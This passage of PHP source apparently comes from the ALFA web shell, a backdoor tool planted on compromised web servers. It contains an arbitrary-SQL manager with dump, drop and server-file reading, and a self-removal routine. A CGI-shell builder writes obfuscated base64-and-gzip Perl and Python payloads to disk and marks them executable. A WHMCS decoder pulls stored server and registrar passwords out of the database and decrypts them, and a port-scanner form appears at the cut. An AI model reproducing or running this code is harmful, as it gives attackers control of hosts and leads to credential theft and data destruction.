5210$_SESSION["sql_host"] = $_POST['sql_host'];
5211$_SESSION["sql_login"] = $_POST['sql_login'];
5212$_SESSION["sql_pass"] = $_POST['sql_pass'];
5213$_SESSION["sql_base"] = $_POST['sql_base'];
5214switch($_POST['charset']){
5215case "Windows-1251": $db->setCharset('calfa1251'); break;
5216case "UTF-8": $db->setCharset('utf8'); break;
5217case "KOI8-R": $db->setCharset('koi8r'); break;
5218case "KOI8-U": $db->setCharset('koi8u'); break;
5219case "calfa866": $db->setCharset('calfa866'); break;
5220}
5221$db->setCharset('utf8');
5222$db->listDbs();
5223echo "<select name=sql_base><option value=''></option>";
5224while($item = $db->fetch()) {
5225list($key, $value) = each($item);
5226echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
5227}
5228echo '</select>';
5229}
5230else echo $tmp;
5231}else
5232echo $tmp;
5233echo "</td>
5234<td><input type='submit' value=' '></td>
5235<td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
5236</tr>
5237</table>
5238<script>mysql_cache['host']='".addslashes($_POST['sql_host'])."';mysql_cache['user']='".addslashes($_POST['sql_login'])."';mysql_cache['pass']='".addslashes($_POST['sql_pass'])."';mysql_cache['db']='".addslashes($_POST['sql_base'])."';mysql_cache['charset']='".addslashes($_POST['charset'])."';mysql_cache['type']='".addslashes($_POST['type'])."';mysql_cache['count']='".addslashes($_POST['sql_count'])."'</script>
5239";
5240if(isset($db) && $db->link){
5241echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
5242if(!empty($_POST['sql_base'])){
5243$db->selectdb($_POST['sql_base']);
5244echo "<tr><td width=1 style='border-top:2px solid #666;'><div class='txtfont'>Tables:</div><br><br>";
5245$tbls_res = $db->listTables();
5246while($item = $db->fetch($tbls_res)){
5247list($key, $value) = each($item);
5248if(!empty($_POST['sql_count']))
5249$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
5250$value = htmlspecialchars($value);
5251echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href='javascript:void(0);' onclick=\"fs('0','".$value."')\"><span class='mysql_tables' style='font-weight:unset;'>".$value."</span></a>" . (empty($_POST['sql_count'])?' ':" <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</nobr><br>";
5252}
5253echo "<p><input type='checkbox' onclick='is();'> <input type='button' value=' Dump ' onclick=\"fs('4');\" class='button'> <input type='button' value=' Drop ! ' onclick=\"fs('5');\" class='button'></p><div class='txtfont'>File path:</div><input type='text' id='dumpfile' name='file' value='dump.sql'>".($dumpStatus?'<p><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'dump.sql\', \'download\')"><font color="#0F0">~ Download File ~</font></a></p>':'')."</td><td style='border-top:2px solid #666;'>";
5254if(@$_POST['alfa1'] == 'select'){
5255$_POST['alfa1'] = 'query';
5256$_POST['alfa3'] = $_POST['alfa3']?$_POST['alfa3']:1;
5257$db->query('SELECT COUNT(*) as n FROM `'.$_POST['alfa2'].'`');
5258$num = $db->fetch();
5259$pages = ceil($num['n'] / 30);
5260echo "<span>".$_POST['alfa2']."</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . ((int)$_POST['alfa3']) . ">";
5261echo " of $pages";
5262if($_POST['alfa3'] > 1)
5263echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']-1)."\"]')>< Prev</a>";
5264if($_POST['alfa3'] < $pages)
5265echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']+1)."\"]')>Next ></a>";
5266$_POST['alfa3']--;
5267$cache_table = $_POST['alfa2'];
5268if($_POST['type']=='pgsql')
5269$_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT 30 OFFSET '.($_POST['alfa3']*30);
5270else
5271$_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT '.($_POST['alfa3']*30).',30';
5272echo "<br><br>";
5273}
5274if((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2'])) {
5275$prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($_POST['sql_base'])."' AND TABLE_NAME = '".@addslashes($cache_table)."' AND COLUMN_KEY = 'PRI'"));
5276$db->query(@$_POST['alfa2']);
5277if($db->res !== false){
5278$title = false;
5279echo '<table width="100%" cellspacing="1" cellpadding="2" class="main" style="background-color:#292929" border="1">';
5280$line = 1;
5281while($item = $db->fetch()) {
5282if(!$title){
5283echo '<tr><th>#</th>';
5284foreach($item as $key => $value){
5285echo '<th>'.$key.'</th>';
5286}
5287reset($item);
5288$title=true;
5289echo '</tr><tr>';
5290$line = 2;
5291}
5292if($cache_table!=''){
5293 $cacheMsg = '<a href="javascript:void(0);" onclick=fs(\'2\',\'["'.$cache_table.'","'.(!$prikey['COLUMN_NAME']?0:$prikey['COLUMN_NAME']).'","'.__ZW5jb2Rlcg(json_encode((!$prikey['COLUMN_NAME']?$item:$item[$prikey['COLUMN_NAME']]))).'"]\')>Edit</a>';
5294}else{
5295 $cacheMsg ='-';
5296}
5297echo '<tr class="l'.$line.'"><td>'.$cacheMsg.'</td>';
5298$line = $line==1?2:1;
5299foreach($item as $key => $value){
5300if($value == null)
5301echo '<td><i>null</i></td>';
5302else
5303echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
5304}
5305echo '</tr>';
5306}
5307echo '</table>';
5308} else {
5309echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
5310}
5311}
5312echo('</form>');
5313if((@$_POST['alfa1'] == 'edit') && !empty($_POST['alfa2'])){
5314$data = explode(':',$_POST['alfa3']);
5315echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data[0].'</font></p>');
5316echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
5317if($data[1] != '0'){
5318$data[2] = __ZGVjb2Rlcg($data[2]);
5319$data[2] = str_replace('"','',$data[2]);
5320$fetch = $db->fetch($db->query("SELECT * FROM `".$data[0]."` WHERE `".$data[1]."` = '".$data[2]."'"));
5321$fetch['__ALFAKEY'] = $data[1];
5322$fetch['__ALFAKEYVAL'] = $data[2];
5323}else{
5324$d = __ZGVjb2Rlcg($data[2]);
5325$fetch = json_decode($d, true);
5326}
5327foreach($fetch as $key => $value){
5328if($key=='__ALFAKEY'||$key=='__ALFAKEYVAL')continue;
5329$value = htmlspecialchars($value);
5330echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
5331}
5332echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode(($data[1] != '0'?array('__ALFAKEY'=>$data[1],'__ALFAKEYVAL'=>$data[2]):$fetch)))."'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>");
5333}
5334if((@$_POST['alfa1'] == 'update') && !empty($_POST['alfa2'])){
5335$data = json_decode($_POST['alfa2'], true);
5336$alfadata = $data['__ALFADATA'];
5337$data2 = json_decode(__ZGVjb2Rlcg($alfadata), true);
5338$keyval = array();
5339echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data['__ALFATBL'].'</font></p>');
5340echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
5341$set = '';
5342foreach($data as $key => $value){
5343if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
5344if($data2['__ALFAKEY']==$key){
5345$keyval['__ALFAKEY'] = $key;
5346$keyval['__ALFAKEYVAL'] = $value;
5347}
5348$set .= "`$key` = '".addslashes($value)."',";
5349$value = htmlspecialchars($value);
5350echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
5351}
5352unset($data['__ALFADATA']);
5353
5354echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode((isset($data2['__ALFAKEY'])?array('__ALFAKEY'=>$keyval['__ALFAKEY'],'__ALFAKEYVAL'=>$keyval['__ALFAKEYVAL']):$data)))."'><input type='hidden' name='__ALFATBL' value='{$data['__ALFATBL']}'><input type='submit' value=' '></form>");
5355
5356if(!isset($data2['__ALFAKEY'])){
5357$where = '';
5358foreach($data2 as $key => $value){
5359if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
5360$value = addslashes($value);
5361$where .= "`$key` = '$value' AND ";
5362}
5363$where = substr($where, 0, -4);
5364}else{
5365$where = "`{$data2['__ALFAKEY']}` = '".addslashes($data2['__ALFAKEYVAL'])."'";
5366}
5367$set = substr($set, 0, -1);
5368$db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where"));
5369if($db->error())
5370echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
5371else echo("Success...!");
5372}
5373if($_POST['alfa1']!='edit'&&$_POST['alfa1']!='update'){
5374echo "<p>Query:</p><form onsubmit='fs(this);return false;'>
5375<input type='hidden' name='alfa1' value='query'/>
5376<textarea name='query' style='width:100%;height:100px'>";
5377echo $_POST['alfa1']!='loadfile'?htmlspecialchars($_POST['alfa2']):'';
5378echo "</textarea><p><center><input type=submit value=' '></center></p></form>";
5379}
5380echo "</td></tr>";
5381}
5382echo "</table></form><br/>";
5383if($_POST['type']=='mysql') {
5384$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
5385if($db->fetch())
5386echo "<form onsubmit=\"fs('3',this.f.value);return false;\"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>";
5387}
5388if(@$_POST['alfa1'] == 'loadfile'){
5389$file = $db->loadFile($_POST['alfa2']);
5390echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
5391}
5392}else{
5393echo htmlspecialchars($db->error());
5394}
5395echo '</div>';
5396alfafooter();
5397}
5398function alfaselfrm(){
5399if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){
5400echo(__pre().'<center>');
5401if(@unlink($GLOBALS['__file_path'])){
5402echo('<b>Shell has been removed</i> :)</b>');
5403}else{
5404echo 'unlink error!';
5405}
5406echo('</center>');
5407}
5408if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){
5409echo "<div class=header>";
5410echo "
5411<center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
5412echo '<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');"> Yes</a>';
5413echo '</p></center></div>';
5414}
5415}
5416function alfacgishell(){
5417alfahead();
5418$div = "";
5419if(!in_array($_POST['alfa1'],array('perl','py'))){
5420$div = "</div>";
5421echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="runcgi(\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="runcgi(\'py\');">| Python | </a>';
5422}
5423if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){
5424@mkdir('cgialfa',0755);
5425@chdir('cgialfa');
5426alfacgihtaccess('cgi');
5427$name = $_POST['alfa1'].'.alfa';
5428$perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';;
5429$py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
5430if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}
5431if(__write_file($name,$code)){
5432@chmod($name,0755);
5433echo '<iframe src="'.'cgialfa/'.$name.'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
5434}
5435}
5436echo $div;
5437alfafooter();
5438}
5439function alfaWhmcs(){
5440alfahead();
5441echo '<div class=header>';
5442function decrypt($string,$cc_encryption_hash){
5443$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
5444$hash_key = _hash($key);
5445$hash_length = strlen ($hash_key);
5446$string = __ZGVjb2Rlcg($string);
5447$tmp_iv = substr ($string, 0, $hash_length);
5448$string = substr ($string, $hash_length, strlen ($string) - $hash_length);
5449$iv = $out = '';
5450$c = 0;
5451while ($c < $hash_length)
5452{
5453$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
5454++$c;
5455}
5456$key = $iv;
5457$c = 0;
5458while ($c < strlen ($string))
5459{
5460if (($c != 0 AND $c % $hash_length == 0))
5461{
5462$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
5463}
5464$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
5465++$c;
5466}
5467return $out;
5468}
5469function _hash($string)
5470{
5471if(function_exists('sha1'))
5472{
5473$hash = sha1 ($string);
5474}
5475else
5476{
5477$hash = md5 ($string);
5478}
5479$out = '';
5480$c = 0;
5481while ($c < strlen ($hash))
5482{
5483$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
5484$c += 2;
5485}
5486return $out;
5487}
5488AlfaNum(8,9,10);
5489echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>".getConfigHtml('whmcs')."</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
5490<input type='hidden' name='form_action' value='2'>";
5491$table = array('td1' =>
5492 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
5493 'td2' =>
5494 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
5495 'td3' =>
5496 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
5497 'td4' =>
5498 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
5499 'td5' =>
5500 array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50')
5501);
5502create_table($table);
5503echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
5504if($_POST['alfa5']!=''){
5505$db_host=($_POST['alfa7']);
5506$db_username=($_POST['alfa3']);
5507$db_password=($_POST['alfa4']);
5508$db_name=($_POST['alfa5']);
5509$cc_encryption_hash=($_POST['alfa6']);
5510echo __pre();
5511$conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
5512$query = mysqli_query($conn,"SELECT * FROM tblservers");
5513$num = mysqli_num_rows($query);
5514if ($num > 0){
5515for($i=0; $i <=$num-1; $i++){
5516$v = @mysqli_fetch_array($query);
5517$ipaddress = $v['ipaddress'];
5518$username = $v['username'];
5519$type = $v['type'];
5520$active = $v['active'];
5521$hostname = $v['hostname'];
5522echo("<center><table border='1'>");
5523$password = decrypt ($v['password'], $cc_encryption_hash);
5524echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
5525echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
5526echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
5527echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
5528echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
5529echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
5530echo "</table><br><br></center>";
5531}
5532$query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
5533$num1 = @mysqli_num_rows($query1);
5534if ($num1 > 0){
5535for($i=0; $i <=$num1 -1; $i++){
5536$v = mysqli_fetch_array($query1);
5537$registrar = $v['registrar'];
5538$setting = $v['setting'];
5539$value = decrypt($v['value'], $cc_encryption_hash);
5540if ($value==""){
5541$value=0;
5542}
5543echo("<center>Domain Reseller <br><center>");
5544echo("<center><table border='1'>");
5545echo("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
5546echo("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
5547echo("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
5548echo "</table><br><br></center>";
5549}
5550}
5551}else{__alert('<font color="red">tblservers is Empty...!</font>');};
5552}
5553echo "</div>";
5554alfafooter();
5555}
5556function alfaportscanner(){
5557alfahead();
5558echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
5559<form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
5560<input type="hidden" name="y" value="phptools">
5561<div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
5562<div class="txtfont">Port start: </div> <input id="text" size="5" type="text" name="start" value="80"/>
5563<div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
5564</form></center><br>';
5565$start = strip_tags($_POST['alfa2']);
5566$end = strip_tags($_POST['alfa3']);
5567$host = strip_tags($_POST['alfa4']);
